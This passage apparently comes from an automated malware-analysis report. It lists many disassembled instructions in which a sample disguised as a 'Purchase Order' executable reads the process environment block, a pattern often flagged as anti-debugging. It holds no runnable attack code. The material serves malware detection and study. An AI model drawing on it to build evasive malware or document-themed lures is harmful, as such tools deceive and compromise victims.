      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348450E4 mov eax, dword ptr fs:[00000030h]11_2_348450E4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348450E4 mov ecx, dword ptr fs:[00000030h]11_2_348450E4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E903E mov eax, dword ptr fs:[00000030h]11_2_348E903E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E903E mov eax, dword ptr fs:[00000030h]11_2_348E903E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E903E mov eax, dword ptr fs:[00000030h]11_2_348E903E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E903E mov eax, dword ptr fs:[00000030h]11_2_348E903E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484B052 mov eax, dword ptr fs:[00000030h]11_2_3484B052
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348A106E mov eax, dword ptr fs:[00000030h]11_2_348A106E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F5060 mov eax, dword ptr fs:[00000030h]11_2_348F5060
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831070 mov eax, dword ptr fs:[00000030h]11_2_34831070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831070 mov ecx, dword ptr fs:[00000030h]11_2_34831070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831070 mov eax, dword ptr fs:[00000030h]11_2_34831070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831070 mov eax, dword ptr fs:[00000030h]11_2_34831070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831070 mov eax, dword ptr fs:[00000030h]11_2_34831070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831070 mov eax, dword ptr fs:[00000030h]11_2_34831070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831070 mov eax, dword ptr fs:[00000030h]11_2_34831070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831070 mov eax, dword ptr fs:[00000030h]11_2_34831070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831070 mov eax, dword ptr fs:[00000030h]11_2_34831070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831070 mov eax, dword ptr fs:[00000030h]11_2_34831070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831070 mov eax, dword ptr fs:[00000030h]11_2_34831070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831070 mov eax, dword ptr fs:[00000030h]11_2_34831070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831070 mov eax, dword ptr fs:[00000030h]11_2_34831070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3489D070 mov ecx, dword ptr fs:[00000030h]11_2_3489D070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348D5180 mov eax, dword ptr fs:[00000030h]11_2_348D5180
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348D5180 mov eax, dword ptr fs:[00000030h]11_2_348D5180
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34877190 mov eax, dword ptr fs:[00000030h]11_2_34877190
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348D11A4 mov eax, dword ptr fs:[00000030h]11_2_348D11A4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348D11A4 mov eax, dword ptr fs:[00000030h]11_2_348D11A4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348D11A4 mov eax, dword ptr fs:[00000030h]11_2_348D11A4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348D11A4 mov eax, dword ptr fs:[00000030h]11_2_348D11A4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483B1B0 mov eax, dword ptr fs:[00000030h]11_2_3483B1B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F51CB mov eax, dword ptr fs:[00000030h]11_2_348F51CB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485D1D0 mov eax, dword ptr fs:[00000030h]11_2_3485D1D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485D1D0 mov ecx, dword ptr fs:[00000030h]11_2_3485D1D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348451EF mov eax, dword ptr fs:[00000030h]11_2_348451EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348451EF mov eax, dword ptr fs:[00000030h]11_2_348451EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348451EF mov eax, dword ptr fs:[00000030h]11_2_348451EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348451EF mov eax, dword ptr fs:[00000030h]11_2_348451EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348451EF mov eax, dword ptr fs:[00000030h]11_2_348451EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348451EF mov eax, dword ptr fs:[00000030h]11_2_348451EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348451EF mov eax, dword ptr fs:[00000030h]11_2_348451EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348451EF mov eax, dword ptr fs:[00000030h]11_2_348451EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348451EF mov eax, dword ptr fs:[00000030h]11_2_348451EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348451EF mov eax, dword ptr fs:[00000030h]11_2_348451EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348451EF mov eax, dword ptr fs:[00000030h]11_2_348451EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348451EF mov eax, dword ptr fs:[00000030h]11_2_348451EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348451EF mov eax, dword ptr fs:[00000030h]11_2_348451EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348251ED mov eax, dword ptr fs:[00000030h]11_2_348251ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348C71F9 mov esi, dword ptr fs:[00000030h]11_2_348C71F9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34821131 mov eax, dword ptr fs:[00000030h]11_2_34821131
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34821131 mov eax, dword ptr fs:[00000030h]11_2_34821131
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481B136 mov eax, dword ptr fs:[00000030h]11_2_3481B136
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481B136 mov eax, dword ptr fs:[00000030h]11_2_3481B136
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481B136 mov eax, dword ptr fs:[00000030h]11_2_3481B136
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481B136 mov eax, dword ptr fs:[00000030h]11_2_3481B136
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34819148 mov eax, dword ptr fs:[00000030h]11_2_34819148
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34819148 mov eax, dword ptr fs:[00000030h]11_2_34819148
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34819148 mov eax, dword ptr fs:[00000030h]11_2_34819148
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34819148 mov eax, dword ptr fs:[00000030h]11_2_34819148
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34827152 mov eax, dword ptr fs:[00000030h]11_2_34827152
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F5152 mov eax, dword ptr fs:[00000030h]11_2_348F5152
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348B9179 mov eax, dword ptr fs:[00000030h]11_2_348B9179
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F172 mov eax, dword ptr fs:[00000030h]11_2_3481F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F172 mov eax, dword ptr fs:[00000030h]11_2_3481F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F172 mov eax, dword ptr fs:[00000030h]11_2_3481F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F172 mov eax, dword ptr fs:[00000030h]11_2_3481F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F172 mov eax, dword ptr fs:[00000030h]11_2_3481F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F172 mov eax, dword ptr fs:[00000030h]11_2_3481F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F172 mov eax, dword ptr fs:[00000030h]11_2_3481F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F172 mov eax, dword ptr fs:[00000030h]11_2_3481F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F172 mov eax, dword ptr fs:[00000030h]11_2_3481F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F172 mov eax, dword ptr fs:[00000030h]11_2_3481F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F172 mov eax, dword ptr fs:[00000030h]11_2_3481F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F172 mov eax, dword ptr fs:[00000030h]11_2_3481F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F172 mov eax, dword ptr fs:[00000030h]11_2_3481F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F172 mov eax, dword ptr fs:[00000030h]11_2_3481F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F172 mov eax, dword ptr fs:[00000030h]11_2_3481F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F172 mov eax, dword ptr fs:[00000030h]11_2_3481F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F172 mov eax, dword ptr fs:[00000030h]11_2_3481F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F172 mov eax, dword ptr fs:[00000030h]11_2_3481F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F172 mov eax, dword ptr fs:[00000030h]11_2_3481F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F172 mov eax, dword ptr fs:[00000030h]11_2_3481F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F172 mov eax, dword ptr fs:[00000030h]11_2_3481F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F5283 mov eax, dword ptr fs:[00000030h]11_2_348F5283
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485329E mov eax, dword ptr fs:[00000030h]11_2_3485329E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485329E mov eax, dword ptr fs:[00000030h]11_2_3485329E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348352A0 mov eax, dword ptr fs:[00000030h]11_2_348352A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348352A0 mov eax, dword ptr fs:[00000030h]11_2_348352A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348352A0 mov eax, dword ptr fs:[00000030h]11_2_348352A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348352A0 mov eax, dword ptr fs:[00000030h]11_2_348352A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E92A6 mov eax, dword ptr fs:[00000030h]11_2_348E92A6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E92A6 mov eax, dword ptr fs:[00000030h]11_2_348E92A6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E92A6 mov eax, dword ptr fs:[00000030h]11_2_348E92A6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E92A6 mov eax, dword ptr fs:[00000030h]11_2_348E92A6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348B72A0 mov eax, dword ptr fs:[00000030h]11_2_348B72A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348B72A0 mov eax, dword ptr fs:[00000030h]11_2_348B72A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348A92BC mov eax, dword ptr fs:[00000030h]11_2_348A92BC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348A92BC mov eax, dword ptr fs:[00000030h]11_2_348A92BC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348A92BC mov ecx, dword ptr fs:[00000030h]11_2_348A92BC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348A92BC mov ecx, dword ptr fs:[00000030h]11_2_348A92BC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348292C5 mov eax, dword ptr fs:[00000030h]11_2_348292C5
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348292C5 mov eax, dword ptr fs:[00000030h]11_2_348292C5
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481B2D3 mov eax, dword ptr fs:[00000030h]11_2_3481B2D3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481B2D3 mov eax, dword ptr fs:[00000030h]11_2_3481B2D3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481B2D3 mov eax, dword ptr fs:[00000030h]11_2_3481B2D3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484F2D0 mov eax, dword ptr fs:[00000030h]11_2_3484F2D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484F2D0 mov eax, dword ptr fs:[00000030h]11_2_3484F2D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348D12ED mov eax, dword ptr fs:[00000030h]11_2_348D12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348D12ED mov eax, dword ptr fs:[00000030h]11_2_348D12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348D12ED mov eax, dword ptr fs:[00000030h]11_2_348D12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348D12ED mov eax, dword ptr fs:[00000030h]11_2_348D12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348D12ED mov eax, dword ptr fs:[00000030h]11_2_348D12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348D12ED mov eax, dword ptr fs:[00000030h]11_2_348D12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348D12ED mov eax, dword ptr fs:[00000030h]11_2_348D12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348D12ED mov eax, dword ptr fs:[00000030h]11_2_348D12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348D12ED mov eax, dword ptr fs:[00000030h]11_2_348D12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348D12ED mov eax, dword ptr fs:[00000030h]11_2_348D12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348D12ED mov eax, dword ptr fs:[00000030h]11_2_348D12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348D12ED mov eax, dword ptr fs:[00000030h]11_2_348D12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348D12ED mov eax, dword ptr fs:[00000030h]11_2_348D12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348D12ED mov eax, dword ptr fs:[00000030h]11_2_348D12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F52E2 mov eax, dword ptr fs:[00000030h]11_2_348F52E2
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DF2F8 mov eax, dword ptr fs:[00000030h]11_2_348DF2F8
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CB2F0 mov eax, dword ptr fs:[00000030h]11_2_348CB2F0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CB2F0 mov eax, dword ptr fs:[00000030h]11_2_348CB2F0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348192FF mov eax, dword ptr fs:[00000030h]11_2_348192FF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34857208 mov eax, dword ptr fs:[00000030h]11_2_34857208
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34857208 mov eax, dword ptr fs:[00000030h]11_2_34857208
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F5227 mov eax, dword ptr fs:[00000030h]11_2_348F5227
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34819240 mov eax, dword ptr fs:[00000030h]11_2_34819240
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34819240 mov eax, dword ptr fs:[00000030h]11_2_34819240
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485724D mov eax, dword ptr fs:[00000030h]11_2_3485724D
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348AD250 mov ecx, dword ptr fs:[00000030h]11_2_348AD250
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DB256 mov eax, dword ptr fs:[00000030h]11_2_348DB256
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DB256 mov eax, dword ptr fs:[00000030h]11_2_348DB256
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348ED26B mov eax, dword ptr fs:[00000030h]11_2_348ED26B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348ED26B mov eax, dword ptr fs:[00000030h]11_2_348ED26B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34849274 mov eax, dword ptr fs:[00000030h]11_2_34849274
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34861270 mov eax, dword ptr fs:[00000030h]11_2_34861270
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34861270 mov eax, dword ptr fs:[00000030h]11_2_34861270
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F539D mov eax, dword ptr fs:[00000030h]11_2_348F539D
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348433A5 mov eax, dword ptr fs:[00000030h]11_2_348433A5
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348533A0 mov eax, dword ptr fs:[00000030h]11_2_348533A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348533A0 mov eax, dword ptr fs:[00000030h]11_2_348533A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348C13B9 mov eax, dword ptr fs:[00000030h]11_2_348C13B9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348C13B9 mov eax, dword ptr fs:[00000030h]11_2_348C13B9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348C13B9 mov eax, dword ptr fs:[00000030h]11_2_348C13B9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DB3D0 mov ecx, dword ptr fs:[00000030h]11_2_348DB3D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DF3E6 mov eax, dword ptr fs:[00000030h]11_2_348DF3E6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F53FC mov eax, dword ptr fs:[00000030h]11_2_348F53FC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348A930B mov eax, dword ptr fs:[00000030h]11_2_348A930B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348A930B mov eax, dword ptr fs:[00000030h]11_2_348A930B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348A930B mov eax, dword ptr fs:[00000030h]11_2_348A930B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E132D mov eax, dword ptr fs:[00000030h]11_2_348E132D
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E132D mov eax, dword ptr fs:[00000030h]11_2_348E132D
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484F32A mov eax, dword ptr fs:[00000030h]11_2_3484F32A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34817330 mov eax, dword ptr fs:[00000030h]11_2_34817330
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481D34C mov eax, dword ptr fs:[00000030h]11_2_3481D34C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481D34C mov eax, dword ptr fs:[00000030h]11_2_3481D34C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F5341 mov eax, dword ptr fs:[00000030h]11_2_348F5341
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34819353 mov eax, dword ptr fs:[00000030h]11_2_34819353
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34819353 mov eax, dword ptr fs:[00000030h]11_2_34819353
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DF367 mov eax, dword ptr fs:[00000030h]11_2_348DF367
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34827370 mov eax, dword ptr fs:[00000030h]11_2_34827370
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34827370 mov eax, dword ptr fs:[00000030h]11_2_34827370
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34827370 mov eax, dword ptr fs:[00000030h]11_2_34827370
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348C3370 mov eax, dword ptr fs:[00000030h]11_2_348C3370
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34823C84 mov eax, dword ptr fs:[00000030h]11_2_34823C84
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34823C84 mov eax, dword ptr fs:[00000030h]11_2_34823C84
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34823C84 mov eax, dword ptr fs:[00000030h]11_2_34823C84
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34823C84 mov eax, dword ptr fs:[00000030h]11_2_34823C84
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481DCA0 mov eax, dword ptr fs:[00000030h]11_2_3481DCA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484FCA0 mov ecx, dword ptr fs:[00000030h]11_2_3484FCA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484FCA0 mov eax, dword ptr fs:[00000030h]11_2_3484FCA0
